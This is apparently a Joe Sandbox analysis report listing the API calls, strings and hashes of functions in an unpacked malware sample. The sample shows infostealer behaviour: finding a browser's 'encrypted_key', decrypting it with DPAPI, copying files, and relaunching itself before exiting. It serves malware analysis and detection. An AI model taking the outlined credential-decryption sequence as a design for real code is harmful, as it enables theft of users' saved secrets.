                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  • memcmp.MSVCRT(?,00421114,00000003), ref: 022AA116
                                  • memset.MSVCRT ref: 022AA14F
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 022AA1A8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                  • String ID: @
                                  • API String ID: 1977917189-2766056989
                                  • Opcode ID: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                  • Instruction ID: aff0346c788ccc6db1eac906012f3a276c3554e5797786a98a83b3f48f3b4cf7
                                  • Opcode Fuzzy Hash: 20785839e506e71d0d4179be974b45f7974db19f2062455c4e4fb0a2237278dd
                                  • Instruction Fuzzy Hash: D7613C31A20348DBCB24EFE8CD96FED7776AF45304F408118E90A9B598DBB46A05CF51
                                  APIs
                                  • strtok_s.MSVCRT ref: 00410DB8
                                  • strtok_s.MSVCRT ref: 00410EFD
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s$lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 348468850-0
                                  • Opcode ID: 4b65800d2acd206e274dc109e46f0dc3360a9f17ae9b107857cd5d01ef403ffa
                                  • Instruction ID: a77fe6eef144f8be1650d890f93c6b8163d42d0b0f361fe6991083760d0b9acb
                                  • Opcode Fuzzy Hash: 4b65800d2acd206e274dc109e46f0dc3360a9f17ae9b107857cd5d01ef403ffa
                                  • Instruction Fuzzy Hash: 91517FB4A40209EFCB08CF95D595AEE77B5FF44308F10805AE802AB351D774EAD1CB95
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                  • memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                    • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                    • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                    • Part of subcall function 00409B60: memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                    • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpymemcmpmemcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 3731072634-738592651
                                  • Opcode ID: ec1d14112c2b47acda790e7146917a556e3d144796ef31f461d2d78a3888e4ed
                                  • Instruction ID: 5ad523267ed72994677b79ea1d9dce7d7822fbf486e040e59600fa97cf483dfd
                                  • Opcode Fuzzy Hash: ec1d14112c2b47acda790e7146917a556e3d144796ef31f461d2d78a3888e4ed
                                  • Instruction Fuzzy Hash: D53155B5D10109ABCB04EBE4DC85AEF77B8BF44304F14452AE915B7282E7389E04CBA5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CodeInfoPageValidmemset
                                  • String ID:
                                  • API String ID: 703783727-0
                                  • Opcode ID: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                  • Instruction ID: d9385fcfbd834e7522e55f8c95ec8b441be857c093740eb2b52ca725064842b1
                                  • Opcode Fuzzy Hash: a2b74ec6b56f4fd1bb42d268d048981a4065a41abb9520184a3cb1684c992875
                                  • Instruction Fuzzy Hash: 26312834A242929EE7278FB4CC943F9BFA09F46394F0881ABD991CF19AC768C405C761
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022B809E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022B80A5
                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A1D4,00000000,00020119,?), ref: 022B80C5
                                  • RegQueryValueExA.ADVAPI32(?,0064A4EC,00000000,00000000,000000FF,000000FF), ref: 022B80E6
                                  • RegCloseKey.ADVAPI32(?), ref: 022B80F9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction ID: ccc9fa7858402478ef48d29f37943126be62aa16a68bba4cf43a64b2967a67a1
                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction Fuzzy Hash: DB116DB5A94209BBD700CFD4DC4AFBBB7BDEB05740F004219F615A7280C7B458008BA2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417E37
                                  • HeapAlloc.KERNEL32(00000000), ref: 00417E3E
                                  • RegOpenKeyExA.ADVAPI32(80000002,00749EF0,00000000,00020119,?), ref: 00417E5E
                                  • RegQueryValueExA.ADVAPI32(?,00781D78,00000000,00000000,000000FF,000000FF), ref: 00417E7F
                                  • RegCloseKey.ADVAPI32(?), ref: 00417E92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3466090806-0
                                  • Opcode ID: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction ID: f35b37edc560d93cca1bbeb044924e1a71a0ba88b9c12cde0d27c4035fcf8d53
                                  • Opcode Fuzzy Hash: f2207629c624761bbe8885f03498d73c435f9e088398b1cc221a346ec08661e3
                                  • Instruction Fuzzy Hash: 01114CB5A84205FFD710CFD4DD4AFBBBBB9EB09B10F10425AF605A7280D77858018BA6
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022B799B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022B79A2
                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,022B7920), ref: 022B79C2
                                  • RegQueryValueExA.ADVAPI32(022B7920,00420AAC,00000000,00000000,?,000000FF), ref: 022B79E1
                                  • RegCloseKey.ADVAPI32(022B7920), ref: 022B79EB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction ID: d5f877d542e179e845249d659cfe8d6c97d1d7753423be142238c87855a67598
                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                  • Instruction Fuzzy Hash: 8201F4B9A40308FFEB10DFE4DD49FAEB7B9EB48701F104559FA05A7284D67555008F51
                                  APIs
                                  • StrStrA.SHLWAPI(007816A8,?,?,?,0041140C,?,007816A8,00000000), ref: 0041926C
                                  • lstrcpyn.KERNEL32(0064AB88,007816A8,007816A8,?,0041140C,?,007816A8), ref: 00419290
                                  • lstrlenA.KERNEL32(?,?,0041140C,?,007816A8), ref: 004192A7
                                  • wsprintfA.USER32 ref: 004192C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID: %s%s
                                  • API String ID: 1206339513-3252725368
                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                  • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                  • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022A151B
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022A1522
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022A153E
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022A155C
                                  • RegCloseKey.ADVAPI32(?), ref: 022A1566
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3225020163-0
                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                  • Instruction ID: 14a1b3ed69e6e6fce8a2a6de4c2007081361e53772ebd35b64932d8ea5b4738e
                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                  • Instruction Fuzzy Hash: B80131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                  • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                  • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID:
                                  • API String ID: 3466090806-0
                                  • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                  • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                  • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                  • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                  APIs
                                  • __getptd.LIBCMT ref: 022BC9B5
                                    • Part of subcall function 022BC206: __getptd_noexit.LIBCMT ref: 022BC209
                                    • Part of subcall function 022BC206: __amsg_exit.LIBCMT ref: 022BC216
                                  • __getptd.LIBCMT ref: 022BC9CC
                                  • __amsg_exit.LIBCMT ref: 022BC9DA
                                  • __lock.LIBCMT ref: 022BC9EA
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 022BC9FE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                  • Instruction ID: 0bdea2d5ad0990bb33ce136e80e2135baa4f13d2c3666c3c5131773367cbe9ca
                                  • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                  • Instruction Fuzzy Hash: D7F09632D607119FE733BBE855027ED33919F087E8F14010BD814A61D8DBA45541DF59
                                  APIs
                                  • __getptd.LIBCMT ref: 0041C74E
                                    • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                    • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                  • __getptd.LIBCMT ref: 0041C765
                                  • __amsg_exit.LIBCMT ref: 0041C773
                                  • __lock.LIBCMT ref: 0041C783
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 938513278-0
                                  • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                  • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                  • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                  • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,007500D8), ref: 0041079A
                                  • StrCmpCA.SHLWAPI(00000000,00750158), ref: 00410866
                                  • StrCmpCA.SHLWAPI(00000000,007501A8), ref: 0041099D
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: `_A
                                  • API String ID: 3722407311-2339250863
                                  • Opcode ID: 8a35012189f66fda1be3007d90ae9ffade8581afc9871c19ab20889a1dda6df3
                                  • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                  • Opcode Fuzzy Hash: 8a35012189f66fda1be3007d90ae9ffade8581afc9871c19ab20889a1dda6df3
                                  • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,007500D8), ref: 0041079A
                                  • StrCmpCA.SHLWAPI(00000000,00750158), ref: 00410866
                                  • StrCmpCA.SHLWAPI(00000000,007501A8), ref: 0041099D
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID: `_A
                                  • API String ID: 3722407311-2339250863
                                  • Opcode ID: 421f53d52a56a2bbd4cfe63d0fddeb81e19441a4c74e856354e2cedb9b6df6a4
                                  • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                  • Opcode Fuzzy Hash: 421f53d52a56a2bbd4cfe63d0fddeb81e19441a4c74e856354e2cedb9b6df6a4
                                  • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                  APIs
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                  • lstrcatA.KERNEL32(?,00781CD8), ref: 00414C08
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00750258,?,000003E8), ref: 00414A4A
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: UaA$p&x
                                  • API String ID: 2104210347-2887491195
                                  • Opcode ID: d4d019fcf4fe3232f543370437d2fd56697a017286707ca818daa4a4179e68a4
                                  • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                  • Opcode Fuzzy Hash: d4d019fcf4fe3232f543370437d2fd56697a017286707ca818daa4a4179e68a4
                                  • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022B68CA
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 022B698D
                                  • ExitProcess.KERNEL32 ref: 022B69BC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                  • String ID: <
                                  • API String ID: 1148417306-4251816714
                                  • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                  • Instruction ID: 7546be5d1c18b7dcd411dbb206c58c7a8f09a11a4c4894b84f917d7d20652211
                                  • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                  • Instruction Fuzzy Hash: 57316BB1911308ABDB15EFE0DD85FDEB77AAF14300F404189E209A6194DF746B88CF69
                                  APIs
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
